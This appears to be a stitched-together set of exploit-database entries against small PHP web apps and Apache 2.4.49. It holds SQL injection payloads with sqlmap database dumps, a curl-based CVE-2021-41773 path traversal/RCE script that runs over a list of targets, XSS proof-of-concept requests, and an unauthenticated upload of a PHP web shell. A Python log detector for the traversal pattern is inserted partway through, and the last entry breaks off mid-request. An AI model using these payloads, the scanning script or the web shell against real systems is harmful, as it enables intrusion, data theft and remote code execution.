-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

652
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

3
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

1001' RLIKE (SELECT (CASE WHEN (7186=7186) THEN '' ELSE 0x28 END)) AND 'rwJI'='rwJI
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="total_amount"

1651
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="remarks"

Sample
-----------------------------7900788429998101281579901385--

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: -----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="date_created"

2021-08-18T15:00
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="ticket_no"

12345678
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="driver_id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_id"

OFC-789456123
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_name"

George
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="status"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

652
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

3
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

1001' AND (SELECT 2971 FROM(SELECT COUNT(*),CONCAT(0x7162626b71,(SELECT (ELT(2971=2971,1))),0x7162717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'OeqR'='OeqR
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="total_amount"

1651
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="remarks"

Sample
-----------------------------7900788429998101281579901385--

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: -----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="date_created"

2021-08-18T15:00
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="ticket_no"

12345678
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="driver_id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_id"

OFC-789456123
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_name"

George
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="status"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

652
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

3
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

1001' AND (SELECT 5527 FROM (SELECT(SLEEP(5)))GfWJ) AND 'GtGB'='GtGB
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="total_amount"

1651
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="remarks"

Sample
-----------------------------7900788429998101281579901385--

Parameter: MULTIPART #2* ((custom) POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: -----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="date_created"

2021-08-18T15:00
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="ticket_no"

12345678
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="driver_id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_id"

OFC-789456123
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_name"

George
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="status"

1' RLIKE (SELECT (CASE WHEN (8485=8485) THEN '' ELSE 0x28 END)) AND 'CyNe'='CyNe
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

652
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

3
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

1001
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="total_amount"

1651
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="remarks"

Sample
-----------------------------7900788429998101281579901385--

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: -----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="date_created"

2021-08-18T15:00
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="ticket_no"

12345678
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="driver_id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_id"

OFC-789456123
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_name"

George
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="status"

1' AND (SELECT 6653 FROM(SELECT COUNT(*),CONCAT(0x7162626b71,(SELECT (ELT(6653=6653,1))),0x7162717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'tCsu'='tCsu
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

652
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

3
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

1001
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="total_amount"

1651
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="remarks"

Sample
-----------------------------7900788429998101281579901385--

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: -----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="date_created"

2021-08-18T15:00
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="ticket_no"

12345678
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="driver_id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_id"

OFC-789456123
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_name"

George
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="status"

1' AND (SELECT 6178 FROM (SELECT(SLEEP(5)))CQxQ) AND 'MljD'='MljD
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

652
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

3
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

1001
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="total_amount"

1651
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="remarks"

Sample
-----------------------------7900788429998101281579901385--

Parameter: MULTIPART #3* ((custom) POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: -----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="date_created"

2021-08-18T15:00
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="ticket_no"

12345678
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="driver_id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_id"

OFC-789456123
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_name"

George
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="status"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

1' AND 5855=5855 AND 'broT'='broT
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

652
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

3
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

1001
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="total_amount"

1651
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="remarks"

Sample
-----------------------------7900788429998101281579901385--

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: -----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="date_created"

2021-08-18T15:00
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="ticket_no"

12345678
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="driver_id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_id"

OFC-789456123
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_name"

George
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="status"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

1' AND (SELECT 9644 FROM(SELECT COUNT(*),CONCAT(0x7162626b71,(SELECT (ELT(9644=9644,1))),0x7162717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'zaBh'='zaBh
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

652
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

3
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

1001
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="total_amount"

1651
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="remarks"

Sample
-----------------------------7900788429998101281579901385--

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: -----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="date_created"

2021-08-18T15:00
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="ticket_no"

12345678
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="driver_id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_id"

OFC-789456123
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_name"

George
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="status"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

1' AND (SELECT 4422 FROM (SELECT(SLEEP(5)))wQes) AND 'GuRX'='GuRX
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

652
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

3
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

1001
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="total_amount"

1651
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="remarks"

Sample
-----------------------------7900788429998101281579901385--
[...]

# Dump the current user, the current database and all databases on the server using sqlmap

C:\Users\Hubert\Desktop\sqlmapproject-sqlmap-24e3b6a>sqlmap.py --level=5 --risk=3 -r C:\Users\Hubert\Desktop\0day\sql2 --dbms=MySQL --current-user --current-db --dbs --batch
[...]
[06:06:23] [INFO] testing MySQL
[06:06:23] [INFO] confirming MySQL
[06:06:24] [WARNING] reflective value(s) found and filtering out
[06:06:24] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.48, PHP 7.4.23
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[06:06:24] [INFO] fetching current user
[06:06:24] [INFO] resumed: 'root@localhost'
current user: 'root@localhost'
[06:06:24] [INFO] fetching current database
[06:06:24] [INFO] retrieved: 'traffic_offense_db'
current database: 'traffic_offense_db'
[06:06:24] [INFO] fetching database names
[06:06:24] [INFO] retrieved: 'information_schema'
[06:06:24] [INFO] retrieved: 'mysql'
[06:06:24] [INFO] retrieved: 'performance_schema'
[06:06:24] [INFO] retrieved: 'phpmyadmin'
[06:06:24] [INFO] retrieved: 'test'
[06:06:24] [INFO] retrieved: 'test2'
[06:06:24] [INFO] retrieved: 'traffic_offense_db'
available databases [7]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test
[*] test2
[*] traffic_offense_db

[06:06:24] [INFO] fetched data logged to text files under 'C:\Users\Hubert\AppData\Local\sqlmap\output\localhost'

[*] ending @ 06:06:24 /2021-10-07/
            
# Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE)
# Date: 10/05/2021
# Exploit Author: Lucas Souza https://lsass.io
# Vendor Homepage:  https://apache.org/
# Version: 2.4.49
# Tested on: 2.4.49
# CVE : CVE-2021-41773
# Credits: Ash Daulton and the cPanel Security Team

#!/bin/bash

# Usage check: both a target list and a path are required (the original test was a no-op)
if [[ -z $1 || -z $2 ]]; then
echo "Set [TARGET-LIST.TXT] [PATH] [COMMAND]"
echo "./PoC.sh targets.txt /etc/passwd"
exit 1
fi
for host in $(cat $1); do
echo $host
curl -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"; done

# PoC.sh targets.txt /etc/passwd
# PoC.sh targets.txt /bin/sh whoami
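As an added defensive example (not part of the PoC above), the following Python flags the encoded dot-segment pattern this PoC relies on in Apache access logs: a segment that only becomes `..` after percent-decoding is what Apache 2.4.49 failed to normalise. The log lines are constructed samples and the regex assumes the combined log format.

```python
"""Detect encoded dot-segment traversal (the CVE-2021-41773 pattern) in Apache access logs.

Added defensive example; not part of the PoC above. Log lines are constructed samples.
"""
import re
from urllib.parse import unquote

# Constructed sample lines in Apache combined log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [06/Oct/2021:12:00:01 +0000] "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 200 1280 "-" "curl/7.79.1"
203.0.113.5 - - [06/Oct/2021:12:00:02 +0000] "POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1" 200 95 "-" "curl/7.79.1"
198.51.100.7 - - [06/Oct/2021:12:00:03 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [06/Oct/2021:12:00:04 +0000] "GET /docs/../index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.9 - - [06/Oct/2021:12:00:05 +0000] "GET /cgi-bin/%252e%252e/%252e%252e/etc/passwd HTTP/1.1" 404 196 "-" "curl/7.79.1"
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def decode_fully(text, max_rounds=3):
    """Percent-decode until stable, so %2e, %252e and mixed forms all become '.'."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def classify_target(method, raw_target):
    """Return a finding dict for one request target.

    Apache 2.4.49 removed dot segments before decoding %2e, so a segment that
    only becomes '..' after decoding is exactly what slipped past its check.
    """
    path = raw_target.split("?", 1)[0]
    raw_segments = path.split("/")
    # Segments that are not literally '..' but decode to it.
    encoded_dots = sum(1 for s in raw_segments if s != ".." and decode_fully(s) == "..")
    # Walk the decoded path and track how far '..' climbs above the document root.
    depth = min_depth = 0
    for seg in decode_fully(path).split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            depth -= 1
            min_depth = min(min_depth, depth)
        else:
            depth += 1
    if encoded_dots:
        verdict = "encoded_traversal"
    elif min_depth < 0:
        verdict = "plain_traversal"  # normally neutralised by Apache, still worth logging
    else:
        verdict = "benign"
    return {
        "method": method,
        "target": raw_target,
        "encoded_dots": encoded_dots,
        "min_depth": min_depth,
        "cgi_bin": path.startswith("/cgi-bin/"),  # mod_cgi reachable: code execution, not just file read
        "verdict": verdict,
    }


def scan_log(log_text):
    """Return findings for every non-benign request line, with its 1-based line number."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        finding = classify_target(m.group("method"), m.group("target"))
        if finding["verdict"] != "benign":
            finding["line"] = lineno
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']}: {f['verdict']} cgi_bin={f['cgi_bin']} "
              f"encoded_dots={f['encoded_dots']} min_depth={f['min_depth']} {f['method']} {f['target']}")
```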
            
# Exploit Title: Online Traffic Offense Management System 1.0 - Multiple XSS (Unauthenticated)
# Date: 07/10/2021
# Exploit Author: Hubert Wojciechowski
# Contact Author: snup.php@gmail.com
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/14909/online-traffic-offense-management-system-php-free-source-code.html
# Version: 1.0
# Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23

### XSS Stored and XSS Reflected

# All requests can be sent by both an authenticated and a non-authenticated user

# XSS Stored - example vulnerable pages and parameters:

* The entire application is susceptible to Stored XSS; below are example pages and parameters
* An SVG file carrying the XSS payload can be uploaded at every place in the web app that accepts an image
* The malicious content can be added from an admin account, a regular user account, or without authentication - only the request is needed

* http://localhost/traffic_offense/admin/?page=user
  Parameters:
  - firstname
  - lastname
  - user image - svg file with javascript code - XSS
  
* http://localhost/traffic_offense/classes/Master.php?f=save_offense_record
  Parameters:
  - date_created
  - ticket_no
  - officer_id
  - officer_name
  - status
  - remarks
  - SVG file with javascript code - XSS 

* The whole application is affected

# XSS Reflected - example vulnerable pages and parameters:

* http://localhost/traffic_offense/admin/?page
  Parameters:
  - page
  
* http://localhost/traffic_offense/classes/Login.php
  Parameters:
  - username
  - password
  
* http://localhost/traffic_offense/*/&id=1 [all pages where the id parameter is present]
  Parameters:
  - id
  
* http://localhost/traffic_offense/classes/Master.php
  Parameters:
  - id

* http://localhost/traffic_offense/classes/Users.php
  Parameters:
  - id
  
-----------------------------------------------------------------------------------------------------------------------
# POC
-----------------------------------------------------------------------------------------------------------------------

## Example 1 - XSS Reflected

# Request using POST method, payload is in the parameter value id

POST /traffic_offense/classes/Users.php?f=save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------21986352462593413643786432583
Content-Length: 1061
Origin: http://localhost
Connection: close
Referer: http://localhost/traffic_offense/admin/?page=user
Cookie: PHPSESSID=vt0b3an93oqfgacv02oqnvmb0o
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------21986352462593413643786432583
Content-Disposition: form-data; name="id"

13<script>alert(1)</script>37
-----------------------------21986352462593413643786432583
Content-Disposition: form-data; name="firstname"

hacked
[...]

-----------------------------------------------------------------------------------------------------------------------
# Response

HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 01:05:26 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 186
Connection: close
Content-Type: text/html; charset=UTF-8

UPDATE users set  firstname = 'sdasfd'  ,  lastname = 'fdxfd'  ,  username = 'test2'  ,  `password` = 'ad0234829205b9033196ba818f7a872b'  where id = 13<script>alert(1)</script>37

-----------------------------------------------------------------------------------------------------------------------
# Request using GET method, payload is in the parameter value id

GET /traffic_offense/admin/offenses/view_details.php?id=13<script>alert(1)</script>37' HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close

-----------------------------------------------------------------------------------------------------------------------
# Response

HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 05:28:35 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 7893
Connection: close
Content-Type: text/html; charset=UTF-8

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''13<script>alert(1)</script>37''' at line 1
SELECT r.*,d.license_id_no, d.name as driver from `offense_list` r inner join `drivers_list` on r.driver_id = d.id where r.id = '13<script>alert(1)</script>37'' <br />
[...]

-----------------------------------------------------------------------------------------------------------------------

## Example 2

# XSS Stored

# Save the JS payload in the user profile and upload the SVG file through the vulnerable script

POST /traffic_offense/classes/Users.php?f=save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------85748650716762987124528102
Content-Length: 4304
Origin: http://localhost
Connection: close
Referer: http://localhost/traffic_offense/admin/?page=user
Cookie: PHPSESSID=vt0b3an93oqfgacv02oqnvmb0o
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------85748650716762987124528102
Content-Disposition: form-data; name="id"

1
-----------------------------85748650716762987124528102
Content-Disposition: form-data; name="firstname"

admin"/><img src=x onmouseover=alert(1)>
-----------------------------85748650716762987124528102
Content-Disposition: form-data; name="lastname"

admin"/><img src=x onmouseover=alert(1)>
-----------------------------85748650716762987124528102
Content-Disposition: form-data; name="username"

admin
-----------------------------85748650716762987124528102
Content-Disposition: form-data; name="password"

admnin123
-----------------------------85748650716762987124528102
Content-Disposition: form-data; name="img"; filename="xss.svg"
Content-Type: image/svg+xml

[...]SVG PAYLOAD[...]


-----------------------------------------------------------------------------------------------------------------------
# Response

HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 05:31:29 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 1
Connection: close
Content-Type: text/html; charset=UTF-8

1

-----------------------------------------------------------------------------------------------------------------------
# Request to fetch the updated user data

GET /traffic_offense/admin/?page=user/manage_user&id=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close

-----------------------------------------------------------------------------------------------------------------------
# Response

HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 05:42:04 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24719
[...]
			<div class="form-group col-6">
					<label for="name">First Name</label>
					<input type="text" name="firstname" id="firstname" class="form-control" value="admin"/><img src=x onmouseover=alert(1)>" required>
				</div>
				<div class="form-group col-6">
					<label for="name">Last Name</label>
					<input type="text" name="lastname" id="lastname" class="form-control" value="admin"/><img src=x onmouseover=alert(1)>" required>
				</div>
[...]
			<div class="form-group col-6 d-flex justify-content-center">
					<img src="http://localhost/traffic_offense/uploads/1633584660_xss.svg" alt="" id="cimg" class="img-fluid img-thumbnail">
				</div>
[...]
            
# Title: IFSC Code Finder Project 1.0 - SQL injection (Unauthenticated)
# Exploit Author: Yash Mahajan 
# Date: 2021-10-07
# Vendor Homepage: https://phpgurukul.com/ifsc-code-finder-project-using-php/
# Version: 1
# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=14478
# Tested On: Windows 10, XAMPP 
# Vulnerable Parameter: searchifsccode 

Steps to Reproduce:

1) Navigate to http://127.0.0.1/ifscfinder/, enter any number in the search field and capture the request in Burp Suite.
2) Paste the request below into Burp Repeater, and also save it to a txt file.

Request:
========
POST /ifscfinder/search.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 79
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/ifscfinder/
Cookie: PHPSESSID=5877lg2kv4vm0n5sb8e1eb0d0k
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

searchifsccode=')+AND+(SELECT+3757+FROM+(SELECT(SLEEP(20)))lygy)--+fvnT&search=

--------------------------------------------------------------------------------
3) You will see a time delay of 20 seconds in the response.
4) python sqlmap.py -r request.txt -p searchifsccode --dbs
5) All databases can be retrieved using the sqlmap command above
            
# Exploit Title: Online Traffic Offense Management System 1.0 - Multiple RCE (Unauthenticated)
# Date: 07/10/2021
# Exploit Author: Hubert Wojciechowski
# Contact Author: snup.php@gmail.com
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/14909/online-traffic-offense-management-system-php-free-source-code.html
# Version: 1.0
# Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23

### RCE - Remote Code Execution

# All requests can be sent by both an authenticated and a non-authenticated user

# RCE - the RCE vulnerability can be exploited in several ways:

* Driver list: any file can be uploaded as the driver photo - http://localhost/traffic_offense/classes/Master.php?f=save_driver

* System information: any file can be uploaded as the system logo or portal cover - http://localhost/traffic_offense/admin/?page=system_info

* User profile: edit the avatar - http://localhost/traffic_offense/admin/?page=user

* Create a new user with a malicious avatar - http://localhost/traffic_offense/admin/?page=user/manage_user

* Edit another user and replace their avatar with a webshell - http://localhost/traffic_offense/admin/?page=user/manage_user&id=2

-----------------------------------------------------------------------------------------------------------------------
# POC
-----------------------------------------------------------------------------------------------------------------------

## Example 1

# Request sent as an unauthenticated user

POST /traffic_offense/classes/Users.php?f=save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------210106920639395210803657370685
Content-Length: 1184
Origin: http://localhost
Connection: close
Referer: http://localhost/traffic_offense/admin/?page=user/manage_user
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="id"


-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="firstname"

hacked
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="lastname"

hacked
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="username"

hacked
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="password"

hacked
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="type"

1
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="img"; filename="cmd.php"
Content-Type: application/octet-stream

<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="x">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<?php
if($_REQUEST['x']) {
  system($_REQUEST['x']);
  } else phpinfo();
?>
</pre>
</BODY></HTML>



-----------------------------210106920639395210803657370685--

-----------------------------------------------------------------------------------------------------------------------
# Response

HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 07:59:24 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Set-Cookie: PHPSESSID=97gjq4viadndhvi8hvsk9d7v7i; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 1
Connection: close
Content-Type: text/html; charset=UTF-8

1

-----------------------------------------------------------------------------------------------------------------------
# The file was uploaded to the uploads directory
# Request to list files in uploads\

GET /traffic_offense/uploads/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
